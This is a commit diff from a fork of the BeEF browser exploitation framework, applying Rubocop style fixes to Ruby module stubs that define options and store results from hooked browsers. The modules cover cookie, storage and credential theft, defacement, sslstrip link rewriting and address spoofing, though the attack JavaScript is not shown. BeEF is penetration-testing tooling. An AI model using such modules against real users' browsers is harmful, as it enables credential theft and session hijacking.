Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Modules: Resolve many Rubocop violations

Browse Source
This commit is contained in:
Brendan Coles
2022-01-22 12:46:42 +00:00
parent bbe805f017
commit a64480dfab
317 changed files with 3238 additions and 3965 deletions
Download Patch File Download Diff File Expand all files Collapse all files

23
modules/browser/avant_steal_history/module.rb
View File

@@ -14,20 +14,13 @@
# limitations under the License.
#
class Avant_steal_history < BeEF::Core::Command
def self.options
[
{ 'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def self.options
configuration = BeEF::Core::Configuration.instance
return [
{'name' => 'cId', 'ui_label' => 'Command ID', 'value' => '60003', 'type' => 'textarea', 'width' => '400px', 'height' => '25px' }
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

10
modules/browser/browser_fingerprinting/module.rb
View File

@@ -7,15 +7,11 @@
# http://www.itsecuritysolutions.org/2010-03-29_fingerprinting_browsers_using_protocol_handlers/
class Browser_fingerprinting < BeEF::Core::Command
def post_execute
content = {}
content['browser_type'] = @datastore['browser_type'] if not @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] if not @datastore['browser_version'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint browser.'
end
content['browser_type'] = @datastore['browser_type'] unless @datastore['browser_type'].nil?
content['browser_version'] = @datastore['browser_version'] unless @datastore['browser_version'].nil?
content['fail'] = 'Failed to fingerprint browser.' if content.empty?
save content
end
end

16
modules/browser/detect_activex/module.rb
View File

@@ -4,14 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_activex < BeEF::Core::Command
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
def post_execute
content = {}
content['activex'] = @datastore['activex']
save content
if @datastore['results'] =~ /^activex=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', $1)
end
end
activex = @datastore['results'].scan(/^activex=(Yes|No)/).flatten.first
return unless activex
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.activex', activex)
end
end

12
modules/browser/detect_evernote_clipper/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_evernote_clipper < BeEF::Core::Command
def post_execute
content = {}
content['evernote_clipper'] = @datastore['evernote_clipper'] if not @datastore['evernote_clipper'].nil?
save content
end
def post_execute
content = {}
content['evernote_clipper'] = @datastore['evernote_clipper'] unless @datastore['evernote_clipper'].nil?
save content
end
end

3
modules/browser/detect_extensions/module.rb
View File

@@ -8,12 +8,9 @@
# http://jeremiahgrossman.blogspot.fr/2006/08/i-know-what-youve-got-firefox.html
#
class Detect_extensions < BeEF::Core::Command
def post_execute
content = {}
content['extension'] = @datastore['extension']
save content
end
end

12
modules/browser/detect_firebug/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_firebug < BeEF::Core::Command
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] if not @datastore['firebug'].nil?
save content
end
def post_execute
content = {}
content['firebug'] = @datastore['firebug'] unless @datastore['firebug'].nil?
save content
end
end

16
modules/browser/detect_foxit/module.rb
View File

@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_foxit < BeEF::Core::Command
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
if @datastore['results'] =~ /^foxit=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', $1)
end
end
def post_execute
content = {}
content['foxit'] = @datastore['foxit']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasFoxit', Regexp.last_match(1)) if @datastore['results'] =~ /^foxit=(Yes|No)/
end
end

12
modules/browser/detect_lastpass/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_lastpass < BeEF::Core::Command
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
save content
end
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] unless @datastore['lastpass'].nil?
save content
end
end

16
modules/browser/detect_office/module.rb
View File

@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
if @datastore['results'] =~ /^office=Office (\d+|Xp)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', $1)
end
end
def post_execute
content = {}
content['office'] = @datastore['office']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'HasOffice', Regexp.last_match(1)) if @datastore['results'] =~ /^office=Office (\d+|Xp)/
end
end

2
modules/browser/detect_popup_blocker/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_popup_blocker < BeEF::Core::Command
def post_execute
content = {}
content['popup_blocker_enabled'] = @datastore['popup_blocker_enabled']
save content
end
end

12
modules/browser/detect_quicktime/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_quicktime < BeEF::Core::Command
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
def post_execute
content = {}
content['quicktime'] = @datastore['quicktime']
save content
end
end

12
modules/browser/detect_realplayer/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_realplayer < BeEF::Core::Command
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
def post_execute
content = {}
content['realplayer'] = @datastore['realplayer']
save content
end
end

12
modules/browser/detect_silverlight/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_silverlight < BeEF::Core::Command
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
def post_execute
content = {}
content['silverlight'] = @datastore['silverlight']
save content
end
end

14
modules/browser/detect_simple_adblock/module.rb
View File

@@ -3,12 +3,10 @@
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_simple_adblock< BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] if not @datastore['simple_adblock'].nil?
save content
end
class Detect_simple_adblock < BeEF::Core::Command
def post_execute
content = {}
content['simple_adblock'] = @datastore['simple_adblock'] unless @datastore['simple_adblock'].nil?
save content
end
end

4
modules/browser/detect_toolbars/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_toolbars < BeEF::Core::Command
def post_execute
content = {}
content['toolbars'] = @datastore['toolbars']
save content
end
end
end

2
modules/browser/detect_unity/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_unity < BeEF::Core::Command
def post_execute
content = {}
content['unity'] = @datastore['unity']
save content
end
end

12
modules/browser/detect_unsafe_activex/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_unsafe_activex < BeEF::Core::Command
def post_execute
content = {}
content['unsafe_activex'] = @datastore['unsafe_activex']
save content
end
def post_execute
content = {}
content['unsafe_activex'] = @datastore['unsafe_activex']
save content
end
end

6
modules/browser/detect_vlc/module.rb
View File

@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_vlc < BeEF::Core::Command
def post_execute
content = {}
content['vlc'] = @datastore['vlc']
save content
if @datastore['results'] =~ /^vlc=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', $1)
end
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.vlc', Regexp.last_match(1)) if @datastore['results'] =~ /^vlc=(Yes|No)/
end
end

16
modules/browser/detect_wmp/module.rb
View File

@@ -4,14 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Detect_wmp < BeEF::Core::Command
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
if @datastore['results'] =~ /^wmp=(Yes|No)/
bd = BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', $1)
end
end
def post_execute
content = {}
content['wmp'] = @datastore['wmp']
save content
BeEF::Core::Models::BrowserDetails.set(@datastore['beefhook'], 'browser.capabilities.wmp', Regexp.last_match(1)) if @datastore['results'] =~ /^wmp=(Yes|No)/
end
end

6
modules/browser/fingerprint_browser/module.rb
View File

@@ -5,15 +5,11 @@
#
class Fingerprint_browser < BeEF::Core::Command
def post_execute
content = {}
content['fingerprint'] = @datastore['fingerprint'] unless @datastore['fingerprint'].nil?
content['components'] = @datastore['components'] unless @datastore['components'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint browser.'
end
content['fail'] = 'Failed to fingerprint browser.' if content.empty?
save content
end
end

8
modules/browser/get_visited_domains/module.rb
View File

@@ -5,11 +5,10 @@
#
class Get_visited_domains < BeEF::Core::Command
def self.options
return [{
'name' => 'domains',
'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).',
[{
'name' => 'domains',
'description' => 'Specify additional resources to fetch during visited domains analysis. Paste to the below field full URLs leading to CSS, image, JS or other *static* resources hosted on desired page. Separate domain names with url by using semicolon (;). Next domains separate by comma (,).',
'type' => 'textarea',
'ui_label' => 'Specify custom page to check',
'value' => 'Github ; https://assets-cdn.github.com/favicon.ico,',
@@ -23,5 +22,4 @@ class Get_visited_domains < BeEF::Core::Command
content['results'] = @datastore['results']
save content
end
end

18
modules/browser/get_visited_urls/module.rb
View File

@@ -4,20 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_visited_urls < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL(s)',
'name'=>'urls',
'description' => 'Enter target URL(s)',
'type'=>'textarea',
'value'=>'http://beefproject.com/',
'width'=>'200px' }
[
{ 'ui_label' => 'URL(s)',
'name' => 'urls',
'description' => 'Enter target URL(s)',
'type' => 'textarea',
'value' => 'http://beefproject.com/',
'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

12
modules/browser/hooked_domain/ajax_fingerprint/module.rb
View File

@@ -5,14 +5,10 @@
#
class Ajax_fingerprint < BeEF::Core::Command
def post_execute
content = {}
content['script_urls'] = @datastore['script_urls'] if not @datastore['script_urls'].nil?
if content.empty?
content['fail'] = 'Failed to fingerprint ajax.'
end
save content
content = {}
content['script_urls'] = @datastore['script_urls'] unless @datastore['script_urls'].nil?
content['fail'] = 'Failed to fingerprint ajax.' if content.empty?
save content
end
end

16
modules/browser/hooked_domain/alert_dialog/module.rb
View File

@@ -4,23 +4,21 @@
# See the file 'doc/COPYING' for copying permission
#
class Alert_dialog < BeEF::Core::Command
# set and return all options for this module
# set and return all options for this module
def self.options
return [{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
[{
'name' => 'text',
'description' => 'Sends an alert dialog to the victim',
'type' => 'textarea',
'ui_label' => 'Alert text',
'value' => 'BeEF Alert Dialog',
'width' => '400px'
}]
'width' => '400px'
}]
end
def post_execute
def post_execute
content = {}
content['User Response'] = "The user clicked the 'OK' button when presented with an alert box."
save content
end
end

13
modules/browser/hooked_domain/apache_tomcat_examples_cookie_disclosure/module.rb
View File

@@ -4,16 +4,15 @@
# See the file 'doc/COPYING' for copying permission
#
class Apache_tomcat_examples_cookie_disclosure < BeEF::Core::Command
def self.options
[
{'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample'},
{ 'name' => 'request_header_servlet_path', 'ui_label' => "'Request Header Example' path", 'value' => '/examples/servlets/servlet/RequestHeaderExample' }
]
end
def post_execute
content = {}
content['cookies'] = @datastore['cookies']
save content
end
def post_execute
content = {}
content['cookies'] = @datastore['cookies']
save content
end
end

2
modules/browser/hooked_domain/clear_console/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Clear_console < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

25
modules/browser/hooked_domain/deface_web_page/module.rb
View File

@@ -4,19 +4,20 @@
# See the file 'doc/COPYING' for copying permission
#
class Deface_web_page < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
return [
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' }
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
[
{ 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project',
'width' => '200px' },
{ 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' },
{ 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label' => 'Deface Content', 'type' => 'textarea', 'value' => 'BeEF!', 'width' => '400px',
'height' => '100px' }
]
end
@@ -24,7 +25,5 @@ class Deface_web_page < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end

10
modules/browser/hooked_domain/deface_web_page_component/module.rb
View File

@@ -4,11 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Deface_web_page_component < BeEF::Core::Command
def self.options
return [
{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
[
{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle',
'width' => '200px' },
{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width' => '200px' }
]
end
@@ -16,7 +16,5 @@ class Deface_web_page_component < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end

2
modules/browser/hooked_domain/disable_developer_tools/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Disable_developer_tools < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

17
modules/browser/hooked_domain/get_autocomplete_creds/module.rb
View File

@@ -4,14 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_autocomplete_creds < BeEF::Core::Command
def self.options
[]
end
def self.options
[]
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
def post_execute
content = {}
content['results'] = @datastore['results']
save content
end
end

2
modules/browser/hooked_domain/get_cookie/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_cookie < BeEF::Core::Command
def post_execute
content = {}
content['cookie'] = @datastore['cookie']
save content
end
end

12
modules/browser/hooked_domain/get_form_values/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_form_values < BeEF::Core::Command
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
def post_execute
content = {}
content['result'] = @datastore['result']
save content
end
end

4
modules/browser/hooked_domain/get_local_storage/module.rb
View File

@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_local_storage < BeEF::Core::Command
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def post_execute
content = {}
content['localStorage'] = @datastore['localStorage']
save content
end
end

2
modules/browser/hooked_domain/get_page_html/module.rb
View File

@@ -4,12 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_html < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
content['body'] = @datastore['body']
save content
end
end

2
modules/browser/hooked_domain/get_page_html_iframe/module.rb
View File

@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_html_iframe < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
@@ -12,5 +11,4 @@ class Get_page_html_iframe < BeEF::Core::Command
content['iframe_'] = @datastore['iframe_']
save content
end
end

2
modules/browser/hooked_domain/get_page_links/module.rb
View File

@@ -4,12 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_page_links < BeEF::Core::Command
def post_execute
content = {}
content['links'] = @datastore['links']
save content
end
end

4
modules/browser/hooked_domain/get_session_storage/module.rb
View File

@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_session_storage < BeEF::Core::Command
# More info:
# http://dev.w3.org/html5/webstorage/
# http://diveintohtml5.org/storage.html
#
def post_execute
content = {}
content['sessionStorage'] = @datastore['sessionStorage']
save content
end
end

34
modules/browser/hooked_domain/get_stored_credentials/module.rb
View File

@@ -4,24 +4,22 @@
# See the file 'doc/COPYING' for copying permission
#
class Get_stored_credentials < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
uri = "#{base_host}/demos/butcher/index.html"
return [
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width'=>'400px' }
]
end
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
uri = "#{base_host}/demos/butcher/index.html"
[
{ 'name' => 'login_url', 'description' => 'Login URL', 'ui_label' => 'Login URL', 'value' => uri, 'width' => '400px' }
]
end
def post_execute
content = {}
content['form_data'] = @datastore['form_data']
save content
end
end

8
modules/browser/hooked_domain/link_rewrite/module.rb
View File

@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

8
modules/browser/hooked_domain/link_rewrite_click_events/module.rb
View File

@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_click_events < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'URL', 'name' => 'url', 'description' => 'Target URL', 'value' => 'http://beefproject.com/', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

4
modules/browser/hooked_domain/link_rewrite_sslstrip/module.rb
View File

@@ -4,9 +4,7 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_sslstrip < BeEF::Core::Command
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

10
modules/browser/hooked_domain/link_rewrite_tel/module.rb
View File

@@ -4,15 +4,13 @@
# See the file 'doc/COPYING' for copying permission
#
class Link_rewrite_tel < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Number', 'name'=>'tel_number', 'description' => 'New telephone number', 'value'=>'5558585', 'width'=>'200px' }
[
{ 'ui_label' => 'Number', 'name' => 'tel_number', 'description' => 'New telephone number', 'value' => '5558585', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

29
modules/browser/hooked_domain/mobilesafari_address_spoofing/module.rb
View File

@@ -4,21 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Mobilesafari_address_spoofing < BeEF::Core::Command
def self.options
[
{ 'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' => 'http://en.wikipedia.org/wiki/Beef' },
{ 'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com' },
{ 'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a' }
]
end
def self.options
return [
{'name' => 'fake_url', 'ui_label' => 'Fake URL', 'type' => 'text', 'value' =>'http://en.wikipedia.org/wiki/Beef'},
{'name' => 'real_url', 'ui_label' => 'Real URL', 'type' => 'text', 'value' => 'http://www.beefproject.com'},
{'name' => 'domselectah', 'ui_label' => 'jQuery Selector for Link rewriting. \'a\' will overwrite all links', 'type' => 'text', 'value' => 'a'}
]
end
def post_execute
content = {}
content['results'] = @datastore['results']
content['query'] = @datastore['query']
save content
end
def post_execute
content = {}
content['results'] = @datastore['results']
content['query'] = @datastore['query']
save content
end
end

12
modules/browser/hooked_domain/overflow_cookiejar/module.rb
View File

@@ -5,12 +5,12 @@
#
class Overflow_cookiejar < BeEF::Core::Command
def self.options
return [
{'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true'}
]
end
def post_execute
save({'result' => @datastore['result']})
[
{ 'name' => 'preserveCookies', 'type' => 'checkbox', 'ui_label' => 'Attempt to preserve all non-httpOnly cookies', 'checked' => 'true' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

13
modules/browser/hooked_domain/prompt_dialog/module.rb
View File

@@ -4,22 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Prompt_dialog < BeEF::Core::Command
def self.options
return [
{'name' =>'question', 'description' =>'Prompt text', 'ui_label'=>'Prompt text'}
[
{ 'name' => 'question', 'description' => 'Prompt text', 'ui_label' => 'Prompt text' }
]
end
#
# This method is being called when a zombie sends some
# data back to the framework.
#
def post_execute
# return if @datastore['answer']==''
# return if @datastore['answer']==''
save({'answer' => @datastore['answer']})
save({ 'answer' => @datastore['answer'] })
end
end

2
modules/browser/hooked_domain/remove_stuck_iframes/module.rb
View File

@@ -4,7 +4,6 @@
# See the file 'doc/COPYING' for copying permission
#
class Remove_stuck_iframes < BeEF::Core::Command
def post_execute
content = {}
content['head'] = @datastore['head']
@@ -12,5 +11,4 @@ class Remove_stuck_iframes < BeEF::Core::Command
content['iframe_'] = @datastore['iframe_']
save content
end
end

9
modules/browser/hooked_domain/replace_video/module.rb
View File

@@ -4,11 +4,10 @@
# See the file 'doc/COPYING' for copying permission
#
class Replace_video < BeEF::Core::Command
def self.options
return [
{'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width'=>'150px'},
{'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
[
{ 'name' => 'youtube_id', 'ui_label' => 'YouTube Video ID', 'value' => 'XZ5TajZYW6Y', 'width' => '150px' },
{ 'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width' => '150px' }
]
end
@@ -16,7 +15,5 @@ class Replace_video < BeEF::Core::Command
content = {}
content['Result'] = @datastore['result']
save content
end
end

3
modules/browser/hooked_domain/rickroll/module.rb
View File

@@ -4,12 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Rickroll < BeEF::Core::Command
def post_execute
content = {}
content['Result'] = @datastore['result']
save content
end
end

9
modules/browser/hooked_domain/site_redirect/module.rb
View File

@@ -4,15 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Site_redirect < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Redirect URL', 'name'=>'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
[
{ 'ui_label' => 'Redirect URL', 'name' => 'redirect_url', 'description' => 'The URL the target will be redirected to.', 'value' => 'http://beefproject.com/',
'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

33
modules/browser/hooked_domain/site_redirect_iframe/module.rb
View File

@@ -4,29 +4,28 @@
# See the file 'doc/COPYING' for copying permission
#
class Site_redirect_iframe < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
beef_port = @configuration.beef_port
base_host = "#{proto}://#{beef_host}:#{beef_port}"
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
return [
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' },
favicon_uri = "#{base_host}/ui/media/images/favicon.ico"
[
{ 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project',
'width' => '200px' },
{ 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width' => '200px' },
{ 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' },
{ 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' }
]
end
{ 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width' => '200px' },
{ 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width' => '150px' }
]
end
# This method is being called when a hooked browser sends some
# data back to the framework.
#
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

19
modules/browser/play_sound/module.rb
View File

@@ -4,10 +4,8 @@
# See the file 'doc/COPYING' for copying permission
#
class Play_sound < BeEF::Core::Command
# set and return all options for this module
def self.options
@configuration = BeEF::Core::Configuration.instance
proto = @configuration.beef_proto
beef_host = @configuration.beef_host
@@ -16,20 +14,19 @@ class Play_sound < BeEF::Core::Command
sound_file_url = "#{base_host}/demos/sound.wav"
return [{
'name' => 'sound_file_uri',
[{
'name' => 'sound_file_uri',
'description' => 'The web accessible URI for the wave sound file.',
'ui_label' => 'Sound File Path',
'value' => sound_file_url,
'width' => '300px'
}]
'width' => '300px'
}]
end
def post_execute
def post_execute
content = {}
content['result'] = @datastore['result']
save content
content['result'] = @datastore['result']
save content
end
end

12
modules/browser/remove_hook_element/module.rb
View File

@@ -4,11 +4,9 @@
# See the file 'doc/COPYING' for copying permission
#
class Remove_hook_element < BeEF::Core::Command
def post_execute
content = {}
content["result"] = @datastore["result"] if not @datastore["result"].nil?
save content
end
def post_execute
content = {}
content['result'] = @datastore['result'] unless @datastore['result'].nil?
save content
end
end

20
modules/browser/spyder_eye/module.rb
View File

@@ -4,11 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Spyder_eye < BeEF::Core::Command
def self.options
return [
{ 'ui_label'=>'Repeat', 'name'=>'repeat', 'description' => 'Number of snapshot to take.', 'value'=>'1', 'width'=>'80px' },
{ 'ui_label'=>'Delay', 'name'=>'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.', 'value'=>'3000', 'width'=>'80px' },
[
{ 'ui_label' => 'Repeat', 'name' => 'repeat', 'description' => 'Number of snapshot to take.', 'value' => '1', 'width' => '80px' },
{ 'ui_label' => 'Delay', 'name' => 'delay', 'description' => 'Delay between taking each snapshot in ms. To low value may severily impact browser\'s performance.',
'value' => '3000', 'width' => '80px' }
]
end
@@ -16,23 +16,23 @@ class Spyder_eye < BeEF::Core::Command
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/spyder_eye/html2canvas.min.js', '/h2c', 'js')
end
def post_execute
def post_execute
content = {}
content['results'] = @datastore['results'] if not @datastore['results'].nil?
content['results'] = @datastore['results'] unless @datastore['results'].nil?
save content
# save screenshot file
begin
timestamp = Time.now.localtime.strftime("%Y-%m-%d_%H-%M-%S")
timestamp = Time.now.localtime.strftime('%Y-%m-%d_%H-%M-%S')
ip = BeEF::Core::Models::BrowserDetails.get(session_id, 'browser.ipaddress')
